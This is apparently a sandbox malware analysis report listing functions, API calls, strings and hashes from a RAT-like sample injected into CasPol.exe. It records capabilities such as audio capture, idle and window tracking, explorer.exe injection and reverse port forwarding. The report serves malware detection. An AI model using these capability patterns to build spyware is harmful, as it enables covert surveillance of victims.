• CloseHandle.KERNEL32(00000000), ref: 00454ADC
• CloseHandle.KERNEL32(?), ref: 00454C26
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00454C58
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 00454C5F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                  • Opcode ID: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                                                                                                                                  • Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ee1e536fdc7f2f0b5cfdc99f6d3f503e334a2caa4375aff0222a5d39aa192cc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                                                                                                                                                  • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                                                                                                                                                  • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                                                                                                                                                    • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                                                                                                                                                  • String ID: [${ User has been idle for $ minutes }$]
                                                                                                                                                                                                                                  • API String ID: 911427763-3954389425
                                                                                                                                                                                                                                  • Opcode ID: a6bb1a4c0eb89d76b1de77a61ede453c0c742a8fd7e953c2b0cd8e17b02ef629
                                                                                                                                                                                                                                  • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6bb1a4c0eb89d76b1de77a61ede453c0c742a8fd7e953c2b0cd8e17b02ef629
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 65535$udp
                                                                                                                                                                                                                                  • API String ID: 0-1267037602
                                                                                                                                                                                                                                  • Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                                                                                                  • Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393B9
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393C6
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 004393CD
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004393F9
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439403
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043940A
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043944D
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439457
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0043945E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0043946A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00439471
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2441525078-0
                                                                                                                                                                                                                                  • Opcode ID: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                                                                                                                                  • Instruction ID: 902c93592471d116807dca9985149206a76c62e8192f2f9a6cc20a0486345b12
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: af2e038675629699a3bdf98db1be6e4acccc81897dfbfa3a6a3584a15f099ab5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F531F17140820ABBEF11AFA5DC449AF3B78EF09364F14016AF81066291DB79CC12DBA9
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,-00000002), ref: 100065F7
                                                                                                                                                                                                                                  • PathFileExistsW.SHLWAPI(?,00000006), ref: 10006793
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExistsFilePath
                                                                                                                                                                                                                                  • String ID: (x86)$LocalAppData$ProgramFiles$\Opera$\Programs\Opera$opera.exe$opera.exe
                                                                                                                                                                                                                                  • API String ID: 1174141254-3709686828
                                                                                                                                                                                                                                  • Opcode ID: 20f353cdd1b36fb23e65d8c500ab5f414f4822a285356463df6aae757a0f072b
                                                                                                                                                                                                                                  • Instruction ID: cd525ab1337c3ee21bd27d398b55dee76c9cea0ea90567e5fc089a1fee8f1736
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 20f353cdd1b36fb23e65d8c500ab5f414f4822a285356463df6aae757a0f072b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5D917E74D20218AAEF00DFA4DC45BEEBBBAFF48744F204119F406E7295EB75A905CB51
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?), ref: 00404E71
                                                                                                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                                                                                                                                                  • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074), ref: 00404FF3
                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                                                                                                                                                  • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                                                                                                                                                  • API String ID: 2956720200-749203953
                                                                                                                                                                                                                                  • Opcode ID: d200e41620427d9473e98f7f60e1a7380e62b4687472ae1eb451e98f2392ac7f
                                                                                                                                                                                                                                  • Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d200e41620427d9473e98f7f60e1a7380e62b4687472ae1eb451e98f2392ac7f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416F2D
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000), ref: 00416F3C
                                                                                                                                                                                                                                  • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416EF0
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                                                                                                                                                  • String ID: <$@$@FG$@FG$Temp
                                                                                                                                                                                                                                  • API String ID: 1107811701-2245803885
                                                                                                                                                                                                                                  • Opcode ID: 6f6c61d22ea9a6171061744b6423a29f13106e4a3f0e6f12fbfb9163f51caaf1
                                                                                                                                                                                                                                  • Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f6c61d22ea9a6171061744b6423a29f13106e4a3f0e6f12fbfb9163f51caaf1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentProcess
                                                                                                                                                                                                                                  • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
                                                                                                                                                                                                                                  • API String ID: 2050909247-4145329354
                                                                                                                                                                                                                                  • Opcode ID: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                                                                                                                  • Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5f4c91d6b24130c8fe2f88965ff0ff9b6bb2609424b04334da58237aef4b63a8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
                                                                                                                                                                                                                                  • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
                                                                                                                                                                                                                                  • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
                                                                                                                                                                                                                                  • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 221034970-0
                                                                                                                                                                                                                                  • Opcode ID: eac2432222f4f4afde1f7cf6c47f526356f61b0485a7c29ded5a18ae6df5b8f9
                                                                                                                                                                                                                                  • Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eac2432222f4f4afde1f7cf6c47f526356f61b0485a7c29ded5a18ae6df5b8f9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045759EA
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: HeapFree.KERNEL32(00000000,00000000,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?), ref: 04575734
                                                                                                                                                                                                                                    • Part of subcall function 0457571E: GetLastError.KERNEL32(?,?,0457924F,?,00000000,?,00000000,?,04579276,?,00000007,?,?,04577E5A,?,?), ref: 04575746
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 045759F6
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A01
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A0C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A17
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A22
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A2D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A38
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A43
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 04575A51
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: a2c8a0a42dbcadfb9ecc7fda1d48ed9a0fa2dec840fb4e5ac87f45e78dc85303
• Instruction ID: 6d5b5fdcac47386bb0652a001ca36f523a9c75e11e60484c7234ed1d84d17ece
• Opcode Fuzzy Hash: a2c8a0a42dbcadfb9ecc7fda1d48ed9a0fa2dec840fb4e5ac87f45e78dc85303
• Instruction Fuzzy Hash: F411D77A12014DFFEB11EF54E840CDD3FA5FF84294B1540B4B9094B521EA31EA50AB84
APIs
• _free.LIBCMT ref: 00446DDF
  • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
• _free.LIBCMT ref: 00446DEB
• _free.LIBCMT ref: 00446DF6
• _free.LIBCMT ref: 00446E01
• _free.LIBCMT ref: 00446E0C
• _free.LIBCMT ref: 00446E17
• _free.LIBCMT ref: 00446E22
• _free.LIBCMT ref: 00446E2D
• _free.LIBCMT ref: 00446E38
• _free.LIBCMT ref: 00446E46
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
• Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
• Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
• Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
APIs
• _free.LIBCMT ref: 10016970
  • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
  • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
• _free.LIBCMT ref: 1001697C
• _free.LIBCMT ref: 10016987
• _free.LIBCMT ref: 10016992
• _free.LIBCMT ref: 1001699D
• _free.LIBCMT ref: 100169A8
• _free.LIBCMT ref: 100169B3
• _free.LIBCMT ref: 100169BE
• _free.LIBCMT ref: 100169C9
• _free.LIBCMT ref: 100169D7
Memory Dump Source
• Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
Similarity
• API ID: _free$ErrorFreeHeapLast
• String ID:
• API String ID: 776569668-0
• Opcode ID: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
• Instruction ID: 4486635b9f067f5c856a3a66de58a1cd354bc26f8124cf63660485fb98f8bcde
• Opcode Fuzzy Hash: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
• Instruction Fuzzy Hash: AC11447A550108FFCB01DF54C982CD93BA5EF08651F9D82A5F9498F622DA32EF909B81
APIs
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: Eventinet_ntoa
• String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
• API String ID: 3578746661-4192532303
• Opcode ID: 8df7f257eef9b2c28c9341c31835349b90e6dee982a5f2442add6739e0b68c40
• Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
• Opcode Fuzzy Hash: 8df7f257eef9b2c28c9341c31835349b90e6dee982a5f2442add6739e0b68c40
• Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
APIs
• DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: DecodePointer
• String ID: acos$asin$exp$log$log10$pow$sqrt
• API String ID: 3527080286-3064271455
• Opcode ID: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
• Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
• Opcode Fuzzy Hash: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
• Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
APIs
• ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
• Sleep.KERNEL32(00000064), ref: 00416688
• DeleteFileW.KERNEL32(00000000), ref: 004166BC
Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: File$CreateDeleteExecuteShellSleep
• String ID: /t $\sysinfo.txt$dxdiag$open$temp
• API String ID: 1462127192-2001430897
• Opcode ID: 368e340a77b9c0e8bffa247c5fc6be13377d75c74f6c97ac0aaf6df9c88f7582
• Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
• Opcode Fuzzy Hash: 368e340a77b9c0e8bffa247c5fc6be13377d75c74f6c97ac0aaf6df9c88f7582
• Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                                                    • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                                                                  Strings
Memory Dump Source
• Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
